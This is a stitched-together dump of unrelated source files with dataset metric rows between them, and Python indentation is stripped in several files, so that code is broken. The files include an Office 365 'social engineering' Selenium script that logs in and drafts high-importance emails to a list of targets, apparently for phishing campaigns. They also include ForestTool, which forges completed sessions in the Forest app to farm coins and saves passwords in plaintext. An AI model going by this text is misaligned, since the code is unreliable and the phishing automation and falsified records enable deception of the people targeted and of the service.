'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Calcutta'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
# Directory where static files are stored
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
BASE_DIR + "/",
]
STATIC_URL = STATICFILES_DIRS[1]
FILES_DIR = os.path.join(BASE_DIR, system.TEMP_FOLDER)
# logger settings
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
"datefmt": "%d/%b/%Y %H:%M:%S"
},
"simple": {
"format": "%(levelname)s %(message)s"
},
},
"handlers": {
"file": {
"level": "DEBUG",
"class": "logging.FileHandler",
"filename": "logs.log",
"formatter": "verbose"
},
},
"loggers": {
"django": {
"handlers": ["file"],
"propagate": True,
"level": "DEBUG",
},
"bo": {
"handlers": ["file"],
"level": "DEBUG",
},
"django.request": {
"handlers": ["file"],
"level": "DEBUG",
"propagate": False,
},
}
}
# RQ Queues
RQ_QUEUES = {
'default': {
'HOST': 'localhost',
'PORT': 6379,
'DB': 0,
'PASSWORD': 'some-password',
'DEFAULT_TIMEOUT': 360,
},
'high': {
'URL': os.getenv('REDISTOGO_URL', 'redis://localhost:6379/0'), # If you're on Heroku
'DEFAULT_TIMEOUT': 500,
},
'low': {
'HOST': 'localhost',
'PORT': 6379,
'DB': 0,
}
}

# --- production/tests/O365_SE_Email.py (repo: GoVanguard/SeleniumBase, license: MIT) ---
"""
The Office 365 Social Engineering Email draft producer uses a customized
library of methods in this master class to maintain continuous delivery.
This repository is controlled by a single boolean that is set to false by
default. Please ensure that the emailDraft.py file is correct.
"""
# Built-in Imports
import os
# SeleniumBase Web Application Testing Framework
from seleniumbase import BaseCase
# Selenium Exception Imports
from selenium.common.exceptions import NoSuchElementException
# Logging Import Setup
import logging
log_file = '/SeleniumBase/production/tests/O365SEEmailLog/test.log'
log_format = '%(asctime)s %(levelname)s: %(message)s'

# Logging file setup (note: the encoding argument requires Python 3.9+)
logging.basicConfig(filename=log_file, format=log_format,
                    encoding='utf-8', level=logging.INFO)
class BaseTestCase(BaseCase):
def setUp(self):
super(BaseTestCase, self).setUp()
# <<< Run custom setUp() code for tests AFTER the super().setUp() >>>
def tearDown(self):
self.save_teardown_screenshot()
if self.has_exception():
# <<< Run custom code if the test failed. >>>
pass
else:
# <<< Run custom code if the test passed. >>>
pass
# (Wrap unreliable tearDown() code in a try/except block.)
# <<< Run custom tearDown() code BEFORE the super().tearDown() >>>
super(BaseTestCase, self).tearDown()
def clickCSSObject(self, CSSSelector):
if self.is_element_present(CSSSelector):
try:
self.click(CSSSelector)
print('CSS Object found: {0}'.format(CSSSelector))
except NoSuchElementException as exc:
print(exc)
print('CSS Object not found: {0}'.format(CSSSelector))
else:
print('CSS Object not found: {0}'.format(CSSSelector))
source = self.get_page_source()
logging.warning(source)
def createEmail(self, email):
toInput = 'input[aria-label="To"]'
ccInput = 'input[aria-label="Cc"]'
cc = os.getenv('O365_SE_TO', '')
subjectInput = 'input[aria-label="Add a subject"]'
subject = os.getenv('O365_SE_SUBJECT', '')
messageInput = 'input[aria-label="Message body"]'
message = os.getenv('O365_SE_MESSAGE', '')
moreOptions = '#compose_ellipses_menu'
importance = 'button[aria-label="Set importance"]'
highImportance = 'button[name="High"]'
clickChain1 = [moreOptions, importance, highImportance]
showMessageOptions = 'button[aria-label="Show message options..."]'
self.type(toInput, email)
self.type(ccInput, cc)
self.type(subjectInput, subject)
self.type(messageInput, message)
self.click_chain(clickChain1, spacing=0.1)
self.clickCSSObject(showMessageOptions)
def createEmails(self):
# <<< Load welcome page markdown. >>>
# Reduce duplicate code in tests by having reusable methods like this.
# If the UI changes, the fix can be applied in one place.
self.open('https://office.com/')
loginBtn = 'div[class="mectrl_header_text mectrl_truncate"]'
usernameInput = '#i0116'
username = os.getenv('O365_SE_USERNAME', 'testUser')
nextBtn = '#idSIButton9'
passwordInput = '#i0118'
password = os.getenv('O365_SE_PASSWORD', 'testPass')
doNotRetainCreds = '#idBtn_Back'
# outlook1 = 'a[aria-label="Outlook"]'
outlook = 'a[id="ShellMail_link"]'
# outlook3 = '#20AC5DE0-9796-4393-8656-9711B92C5223'
newMessage1 = '#id__6'
# newMessage2 = '#id__1718'
self.clickCSSObject(loginBtn)
self.clickCSSObject(usernameInput)
self.type(usernameInput, username)
self.clickCSSObject(nextBtn)
self.type(passwordInput, password)
self.clickCSSObject(nextBtn)
self.clickCSSObject(doNotRetainCreds)
# self.clickCSSObject(outlook1)
self.wait_for_element(outlook)
self.clickCSSObject(outlook)
# self.clickCSSObject(outlook3)
self.wait_for_element(newMessage1)
self.clickCSSObject(newMessage1)
# self.clickCSSObject(newMessage2)
stringList = os.getenv('O365_SE_EMAILS', '')
emailList = stringList.split()
for email in emailList:
self.createEmail(email)
| 39.25 | 78 | 0.64354 | 472 | 4,396 | 5.919492 | 0.434322 | 0.070866 | 0.02577 | 0.030064 | 0.044381 | 0.044381 | 0.028633 | 0.028633 | 0 | 0 | 0 | 0.024442 | 0.246133 | 4,396 | 111 | 79 | 39.603604 | 0.818648 | 0.251592 | 0 | 0.106667 | 0 | 0 | 0.19252 | 0.080319 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0.066667 | 0.093333 | 0 | 0.173333 | 0.053333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5e354afb63b174f5f617ab1a12d24daceb3e23d7 | 1,879 | py | Python | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | anchore_engine/db/db_users.py | bjwschaap/anchore-engine | 0aba1d12d79f63c5919ad301cecc5bd5cc09325a | [
"Apache-2.0"
] | null | null | null | import time
from anchore_engine import db
from anchore_engine.db import User
def add(userId, password, inobj, session=None):
if not session:
session = db.Session()
#our_result = session.query(User).filter_by(userId=userId, password=password).first()
our_result = session.query(User).filter_by(userId=userId).first()
if not our_result:
our_result = User(userId=userId, password=password)
if 'created_at' not in inobj:
inobj['created_at'] = int(time.time())
our_result.update(inobj)
session.add(our_result)
else:
inobj['password'] = password
our_result.update(inobj)
return(True)
def get_all(session=None):
if not session:
session = db.Session()
ret = []
our_results = session.query(User).filter_by()
for result in our_results:
obj = {}
obj.update(dict((key,value) for key, value in vars(result).items() if not key.startswith('_')))
ret.append(obj)
return(ret)
def get(userId, session=None):
if not session:
session = db.Session()
ret = {}
result = session.query(User).filter_by(userId=userId).first()
if result:
obj = dict((key,value) for key, value in vars(result).items() if not key.startswith('_'))
ret = obj
return(ret)
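Both get_all() and get() above serialize an ORM row by filtering vars() for attributes that do not start with an underscore, which drops SQLAlchemy's internal bookkeeping fields. The idiom in isolation (the Row class is a stand-in for a mapped User instance):

```python
class Row(object):
    def __init__(self):
        self.userId = 'admin'
        self.created_at = 1234
        self._sa_instance_state = object()  # internal attribute; filtered out below

obj = dict((key, value) for key, value in vars(Row()).items()
           if not key.startswith('_'))
print(obj == {'userId': 'admin', 'created_at': 1234})  # -> True
```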
def update(userId, password, inobj, session=None):
return(add(userId, password, inobj, session=session))
def delete(userId, session=None):
if not session:
session = db.Session()
ret = False
result = session.query(User).filter_by(userId=userId).first()
if result:
session.delete(result)
ret = True
# try:
# session.commit()
# ret = True
# except Exception as err:
# raise err
# finally:
# session.rollback()
return(ret)
| 23.4875 | 103 | 0.610963 | 236 | 1,879 | 4.775424 | 0.228814 | 0.031056 | 0.070985 | 0.097604 | 0.542147 | 0.44898 | 0.44898 | 0.44898 | 0.414374 | 0.334516 | 0 | 0 | 0.267696 | 1,879 | 79 | 104 | 23.78481 | 0.819041 | 0.130389 | 0 | 0.361702 | 0 | 0 | 0.018462 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106383 | false | 0.106383 | 0.06383 | 0.021277 | 0.170213 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
eaa6e1abc664210c2d20b6da218369d841465733 | 3,306 | py | Python | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 490 | 2019-01-16T12:57:22.000Z | 2022-03-26T14:13:26.000Z | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 147 | 2019-01-23T13:22:42.000Z | 2022-03-30T11:14:08.000Z | backend/lost/api/user/login_manager.py | JonasGoebel/lost | 802be42fb6cd7d046db61a34d77c0b5d233eca46 | [
"MIT"
] | 91 | 2019-03-11T10:37:50.000Z | 2022-03-28T16:41:32.000Z | import datetime
from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus
from lost.settings import LOST_CONFIG, FLASK_DEBUG
from flask_jwt_extended import create_access_token, create_refresh_token
from lost.db.model import User as DBUser, Group
from lost.db import roles
class LoginManager():
def __init__(self, dbm, user_name, password):
self.dbm = dbm
self.user_name = user_name
self.password = password
def login(self):
if LOST_CONFIG.ldap_config['LDAP_ACTIVE']:
access_token, refresh_token = self.__authenticate_ldap()
else:
access_token, refresh_token = self.__authenticate_flask()
if access_token and refresh_token:
return {
'token': access_token,
'refresh_token': refresh_token
}, 200
return {'message': 'Invalid credentials'}, 401
def __get_token(self, user_id):
expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout)
expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2)
if FLASK_DEBUG:
expires = datetime.timedelta(days=365)
expires_refresh = datetime.timedelta(days=366)
access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires)
refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh)
return access_token, refresh_token
def __authenticate_flask(self):
if self.user_name:
user = self.dbm.find_user_by_user_name(self.user_name)
if user and user.check_password(self.password):
return self.__get_token(user.idx)
return None, None
def __authenticate_ldap(self):
# auth with ldap
ldap_manager = LDAP3LoginManager()
ldap_manager.init_config(LOST_CONFIG.ldap_config)
# Check if the credentials are correct
response = ldap_manager.authenticate(self.user_name, self.password)
if response.status != AuthenticationResponseStatus.success:
# no user found in ldap, try it with db user:
return self.__authenticate_flask()
user_info = response.user_info
user = self.dbm.find_user_by_user_name(self.user_name)
# user not in db:
if not user:
user = self.__create_db_user(user_info)
else:
# user in db -> synch with ldap
user = self.__update_db_user(user_info, user)
return self.__get_token(user.idx)
def __create_db_user(self, user_info):
user = DBUser(user_name=user_info['uid'], email=user_info['mail'],
email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'],
last_name=user_info['sn'], is_external=True)
anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR)
user.roles.append(anno_role)
user.groups.append(Group(name=user.user_name, is_user_default=True))
self.dbm.save_obj(user)
return user
def __update_db_user(self, user_info, user):
user.email = user_info['mail']
user.first_name = user_info['givenName']
user.last_name = user_info['sn']
self.dbm.save_obj(user)
        return user
# hackerearth/Algorithms/Matt's Graph Book/solution.py (repo: ATrain951/01.python-com_Qproject, license: MIT)
"""
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
import sys
from collections import defaultdict
sys.setrecursionlimit(100000)
def check(node, adjacency, seen):
seen[node] = True
for vertex in adjacency[node]:
if not seen[vertex]:
check(vertex, adjacency, seen)
n = int(input())
k = int(input())
edges = defaultdict(list)
for _ in range(k):
a, b = list(map(int, input().strip().split()))
edges[a].append(b)
edges[b].append(a)
x = int(input())
count = 0
visited = defaultdict(bool)
visited[x] = True
for i in range(n):
if not visited[i]:
count += 1
check(i, edges, visited)
print('Connected' if count == 1 else 'Not Connected')
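The reachability check above can be exercised without stdin; a self-contained sketch of the same idea (the function name and sample graphs are illustrative, not part of the original submission), using an iterative DFS so the recursion limit never matters:

```python
from collections import defaultdict

def is_connected(n, edge_list):
    """Return True when all n vertices (0..n-1) are mutually reachable."""
    adjacency = defaultdict(list)
    for a, b in edge_list:
        adjacency[a].append(b)
        adjacency[b].append(a)
    seen = [False] * n
    stack = [0]
    seen[0] = True
    while stack:  # iterative depth-first search from vertex 0
        node = stack.pop()
        for vertex in adjacency[node]:
            if not seen[vertex]:
                seen[vertex] = True
                stack.append(vertex)
    return all(seen)

print(is_connected(4, [(0, 1), (1, 2), (2, 3)]))  # True
print(is_connected(4, [(0, 1), (2, 3)]))          # False
```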
# python/863.all-nodes-distance-k-in-binary-tree.py (repo: stavanmehta/leetcode, license: Apache-2.0)
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def distanceK(self, root, target, K):
"""
:type root: TreeNode
:type target: TreeNode
:type K: int
:rtype: List[int]
"""
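One common way to fill in the stub above is to record each node's parent and then breadth-first search outward from the target, treating the tree as an undirected graph. A self-contained sketch (the `TreeNode` class and `distance_k` helper below are assumptions for illustration, not taken from the repo):

```python
from collections import deque

class TreeNode(object):
    def __init__(self, x, left=None, right=None):
        self.val = x
        self.left = left
        self.right = right

def distance_k(root, target, k):
    """Values of all nodes exactly k edges away from target."""
    parent = {}
    stack = [root]
    while stack:  # map every child back to its parent
        node = stack.pop()
        for child in (node.left, node.right):
            if child:
                parent[child] = node
                stack.append(child)
    seen = {target}
    queue = deque([(target, 0)])
    out = []
    while queue:  # BFS over children and parent alike
        node, dist = queue.popleft()
        if dist == k:
            out.append(node.val)
            continue
        for nxt in (node.left, node.right, parent.get(node)):
            if nxt and nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, dist + 1))
    return out

# LeetCode's sample tree: 3 -> (5, 1); 5 -> (6, 2); 2 -> (7, 4); 1 -> (0, 8)
n7, n4 = TreeNode(7), TreeNode(4)
n6, n2 = TreeNode(6), TreeNode(2, n7, n4)
n0, n8 = TreeNode(0), TreeNode(8)
n5, n1 = TreeNode(5, n6, n2), TreeNode(1, n0, n8)
root = TreeNode(3, n5, n1)
print(sorted(distance_k(root, n5, 2)))  # [1, 4, 7]
```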
# coding=utf-8
# ForestTool(Python2)/Main.py (repo: paltis5212/ForestTool, license: MIT)
__author__ = 'zxlee'
__github__ = 'https://github.com/SmileZXLee/forestTool'
import json
import time
import HttpReq
from User import User
from datetime import datetime,timedelta
import sched
import sys
import os
import platform
from dateutil.parser import parse
# True when running on Windows
os_is_windows = platform.system() == 'Windows'
# Time of the most recent successful planting
global plant_succ_time
plant_succ_time = datetime.now()
# Program entry point
def main():
print(u'欢迎使用ForestTool')
try:
with open('user_login.txt', 'r') as f:
user_login_list = f.readlines()
if len(user_login_list) == 2:
s_account = user_login_list[0].strip('\n')
s_pwd = user_login_list[1].strip('\n')
login_input = {'account':s_account,'pwd':s_pwd}
else:
login_input = get_login()
except IOError:
login_input = get_login()
login(login_input)
# Encode a raw_input prompt for the current OS console (gbk on Windows)
def gbk_encode(str):
if os_is_windows:
return str.decode('utf-8').encode('gbk')
else:
return str
# Prompt the user for account and password
def get_login():
account = raw_input(gbk_encode('请输入您的账号: ')).decode(sys.stdin.encoding)
pwd = raw_input(gbk_encode('请输入您的密码: ')).decode(sys.stdin.encoding)
return {'account':account,'pwd':pwd}
# Collect user input for the batch tree-planting feature
def get_add_time():
add_time = raw_input(gbk_encode('请输入专注时间(分钟): '))
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
add_count = raw_input(gbk_encode('请输入批量植树数量: ')).decode(sys.stdin.encoding)
return {'add_time':add_time,'tree_type':tree_type,'note':note,'add_count':add_count}
# Collect user input for the coin-farming feature
def get_coin_task():
add_time = raw_input(gbk_encode('请输入每棵树种植时间(分钟)【5-120分钟,每5分钟一阶段,每增加1阶段多1金币,第一阶段2金币】: ')).decode(sys.stdin.encoding)
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
return {'add_time':add_time,'tree_type':tree_type,'note':note}
# Collect user input for planting over a time range
def get_dis_add():
start_time = raw_input(gbk_encode('请输入开始时间(格式:\'2019-01-01/11:11:11\'): ')).decode(sys.stdin.encoding)
end_time = raw_input(gbk_encode('请输入结束时间(格式:\'2019-01-01/11:11:11\'): ')).decode(sys.stdin.encoding)
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
return {'start_time':start_time,'end_time':end_time,'tree_type':tree_type,'note':note}
# Read the user's menu choice
def get_mode():
mode_input = raw_input(gbk_encode('请选择您要进行的操作: 1.自动刷金币 2.批量植树 3.根据时间区间植树 4.使用其他账号登录 5.退出ForestTool: ')).decode(sys.stdin.encoding)
return mode_input
# Show the main menu
def to_menu(user):
while(True):
mode_input = get_mode()
if mode_input == '1':
add_coin_task(user)
break
elif mode_input == '2':
add_time(user)
break
elif mode_input == '3':
add_dis_time(user)
break
elif mode_input == '4':
login(get_login())
break
elif mode_input == '5':
exit(0)
break
else:
print(u'您的输入不合法,请输入选择!!')
# Log the user in
def login(login_input):
post_json = {
'session':{
'email':login_input['account'],
'password':login_input['pwd'],
},
'seekruid':''
}
print(u'正在登录,请稍后...')
res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/sessions',{},post_json,'','POST')
if res.has_key('remember_token'):
user = User(res['user_name'],res['user_id'],res['remember_token'])
print (u'登录成功!!欢迎您,'+ res['user_name'])
try:
with open('user_login.txt', 'w') as f:
f.write(login_input['account']+'\n')
f.write(login_input['pwd']+'\n')
except IOError:
print(u'IO异常,无法保存账号密码')
to_menu(user)
else:
print(u'登录失败,账号或密码错误,请重新输入!!')
login(get_login())
# Batch tree-planting feature
def add_time(user):
add_time_input = get_add_time()
add_time_data = int(add_time_input['add_time'])
tree_type = int(add_time_input['tree_type'])
print(u'正在执行,请稍后...')
note = add_time_input['note']
add_count = int(add_time_input['add_count'])
curr_count = 0
while curr_count<add_count:
curr_count = curr_count+1
add_per_time(add_time_data,note,tree_type,user,curr_count,'','')
time.sleep(1)
to_menu(user)
# Plant a single tree
def add_per_time(add_time_data,note,tree_type,user,per_add_count,start_time,end_time):
time_now = datetime.now()
time_now = time_now - timedelta(hours = 8)
time_pass = time_now - timedelta(minutes = add_time_data)
if len(start_time):
s_start_time = start_time
else:
s_start_time = time_pass.isoformat()
if len(end_time):
s_end_time = end_time
else:
s_end_time = time_now.isoformat()
post_json = {
"plant": {
"end_time": s_end_time,
"longitude": 0,
"note": note,
"is_success": 1,
"room_id": 0,
"die_reason": '',
"tag": 0,
"latitude": 0,
"has_left": 0,
"start_time": s_start_time,
"trees": [{
"phase": 4,
"theme": 0,
"is_dead": 0,
"position": -1,
"tree_type": tree_type
}]
},
"seekruid": str(user.user_id)
}
print(u'植树中,请稍后...')
post_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/plants',{},post_json,user.remember_token,'POST')
if not post_res.has_key('id'):
        print(u'植树失败!!返回信息:'+str(post_res))
else:
get_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/plants/updated_plants?seekruid='+ str(user.user_id)+'&update_since='+time_now.isoformat()+'/',{},'',user.remember_token,'GET')
now_time = datetime.now()
print(u'【%s】第%d棵树种植成功!!'%(now_time.strftime("%Y-%m-%d %H:%M:%S"),per_add_count))
global plant_succ_time
        plant_succ_time = now_time
# Coin-farming feature
def add_coin_task(user):
get_coin_input = get_coin_task()
add_time = int(get_coin_input['add_time'])
tree_type = get_coin_input['tree_type']
note = get_coin_input['note']
get_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/users/'+str(user.user_id)+'/coin?seekruid='+ str(user.user_id),{},'',user.remember_token,'GET')
if get_res.has_key('coin'):
print(u'您当前金币数:'+str(get_res['coin']))
print(u'开始自动刷金币,每%d分钟植一棵树...'%add_time)
total_time = 0
curr_count = 1
while True:
if curr_count == 1 or (not total_time == 0 and total_time % (add_time * 60) == 0):
add_per_time(add_time,note,tree_type,user,curr_count,'','')
curr_count = curr_count+1
get_res_sub = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/users/'+str(user.user_id)+'/coin?seekruid='+ str(user.user_id),{},'',user.remember_token,'GET')
print(u'您当前金币数:'+str(get_res_sub['coin'])+u'(赚得金币数:'+str(get_res_sub['coin']-get_res['coin'])+')')
global plant_succ_time
total_time = int((datetime.now()-plant_succ_time).total_seconds())
if not total_time == add_time * 60:
sys.stdout.write('\r'+u'距离下一棵树种植时间 :' + str(add_time * 60 - total_time).zfill(len(str(add_time * 60))),)
sys.stdout.flush()
if total_time == add_time * 60:
print('')
time.sleep(1)
# Plant trees over a time range
def add_dis_time(user):
get_dis_input = get_dis_add()
start_time = parse(get_dis_input['start_time'])
end_time = parse(get_dis_input['end_time'])
tree_type = get_dis_input['tree_type']
note = get_dis_input['note']
s_start_time = start_time
s_start_time = s_start_time - timedelta(hours = 8)
end_time = end_time - timedelta(hours = 8)
curr_count = 0
while True:
curr_count = curr_count+1
add_per_time(10,note,tree_type,user,curr_count,s_start_time.isoformat(),(s_start_time + timedelta(minutes = 10)).isoformat())
s_start_time = s_start_time + timedelta(minutes = 10,seconds = 1)
print('下一棵树对应需求时间:'+(s_start_time + timedelta(hours = 8)).strftime("%Y-%m-%d %H:%M:%S"))
if int((end_time - s_start_time).total_seconds()) < 10:
print(u'执行完毕!!')
            break
time.sleep(1)
main()
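`add_per_time` builds the plant window by shifting the local clock back 8 hours (to UTC for a UTC+8 locale) and then subtracting the session length. That window arithmetic can be sketched on its own in Python 3 syntax (the helper name and sample times are made up):

```python
from datetime import datetime, timedelta

def plant_window(now, minutes, utc_offset_hours=8):
    """Return (start, end) ISO timestamps for a session ending at `now` local time."""
    end = now - timedelta(hours=utc_offset_hours)  # local time -> UTC
    start = end - timedelta(minutes=minutes)       # back off by the session length
    return start.isoformat(), end.isoformat()

start, end = plant_window(datetime(2019, 1, 1, 12, 0, 0), 25)
print(start)  # 2019-01-01T03:35:00
print(end)    # 2019-01-01T04:00:00
```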
# -*- coding: utf-8 -*-
# trojsten/people/migrations/0011_auto_20170218_1724.py (repo: MvonK/web, license: MIT)
# Generated by Django 1.9.12 on 2017-02-18 16:24
from django.db import migrations
countries = {
"Ma\u010farsko": "HU",
"Czech Republic": "CZ",
"\u010cesk\xe1 republika": "CZ",
"United Kingdom": "GB",
"Austria": "AT",
"Madarsko": "HU",
"Australia": "AU",
"Srbsko": "RS",
"Kraj Vyso\u010dina, \u010cesk\xe1 republika": "CZ",
"\u010desk\xe1 republika": "CZ",
"\u010cR": "CZ",
"Plze\u0148sk\xfd kraj, \u010cesk\xe1 republika": "CZ",
"Sverige": "SE",
"serbia": "RS",
"\xd6sterreich": "AT",
"Switzerland": "CH",
"ma\u010farsk\xe1 \u013eudovo demokratick\xe1 ": "HU",
"Kosovo": "RS",
"India": "IN",
"Uzbekistan": "UZ",
"Uganda": "UG",
"litva": "LT",
"Velka Britania": "GB",
}
def fix_country_names(apps, schema_editor):
# We can't import the Person model directly as it may be a newer
# version than this migration expects. We use the historical version.
Address = apps.get_model("people", "Address")
for address in Address.objects.all():
address.country = countries.get(address.country, "SK")
address.save()
class Migration(migrations.Migration):
dependencies = [("people", "0010_merge")]
operations = [migrations.RunPython(fix_country_names)]
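The data migration's core move is `dict.get` with a default: any country spelling not in the mapping falls back to `"SK"`. That normalization step can be exercised on its own (the mapping below is a small excerpt, and `normalize_country` is a hypothetical helper, not part of the migration):

```python
COUNTRIES = {
    "Czech Republic": "CZ",
    "Sverige": "SE",
    "Velka Britania": "GB",
}

def normalize_country(name, mapping=COUNTRIES, default="SK"):
    # Unmapped entries (typically Slovak or free-form text) collapse to the default code.
    return mapping.get(name, default)

print(normalize_country("Sverige"))     # SE
print(normalize_country("Bratislava"))  # SK
```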
# archiv/migrations/0015_auto_20210505_1145.py (repo: acdh-oeaw/mmp, license: MIT)
# Generated by Django 3.2 on 2021-05-05 11:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archiv', '0014_stelle_ort'),
]
operations = [
migrations.AddField(
model_name='stelle',
name='end_date',
field=models.PositiveSmallIntegerField(blank=True, help_text="e.g. '1234'", null=True, verbose_name='End Date'),
),
migrations.AddField(
model_name='stelle',
name='start_date',
field=models.PositiveSmallIntegerField(blank=True, help_text="e.g. '300'", null=True, verbose_name='Start Date'),
),
]
# IoTCognito/get_auth_creds.py (repo: devendersatija/IoTCognito, license: MIT-0)
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
# the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
import boto3
import json
def get_auth_creds(secret_details, cipid):
# Cognito auth
auth_credentials = {}
auth_credentials['region'] = secret_details['region']
auth_credentials['policyname'] = secret_details['policyname']
cognitoIdentityClient = boto3.client(
'cognito-identity',
region_name=secret_details['region'])
cognitoClient = boto3.client(
'cognito-idp',
region_name=secret_details['region'])
response = cognitoClient.initiate_auth(
ClientId=secret_details['clientId'],
AuthFlow='USER_PASSWORD_AUTH',
AuthParameters={
'USERNAME': secret_details['username'],
'PASSWORD': secret_details['password']})
accesstoken = response['AuthenticationResult']['AccessToken']
idtoken = response['AuthenticationResult']['IdToken']
refreshtoken = response['AuthenticationResult']['RefreshToken']
provider_name = 'cognito-idp.' + \
secret_details['region'] + '.amazonaws.com/' + secret_details['userpool']
# Get the users unique identity ID
temporaryIdentityId = cognitoIdentityClient.get_id(
IdentityPoolId=cipid, Logins={provider_name: idtoken})
identityID = temporaryIdentityId["IdentityId"]
# Exchange idtoken for AWS Temporary credentials
temporaryCredentials = cognitoIdentityClient.get_credentials_for_identity(
IdentityId=identityID, Logins={provider_name: idtoken})
auth_credentials['AccessKeyId'] = temporaryCredentials["Credentials"]["AccessKeyId"]
auth_credentials['SecretKey'] = temporaryCredentials["Credentials"]["SecretKey"]
auth_credentials['SessionToken'] = temporaryCredentials["Credentials"]["SessionToken"]
auth_credentials['identityID'] = identityID
return auth_credentials
| 46.76 | 118 | 0.731394 | 244 | 2,338 | 6.877049 | 0.45082 | 0.077473 | 0.045292 | 0.027414 | 0.034565 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003581 | 0.163815 | 2,338 | 49 | 119 | 47.714286 | 0.854731 | 0.271172 | 0 | 0.060606 | 0 | 0 | 0.223077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0.060606 | 0.060606 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
# oldplugins/lurk.py (repo: sonicrules1234/sonicbot, license: BSD-3-Clause)
arguments = ["self", "info", "args"]
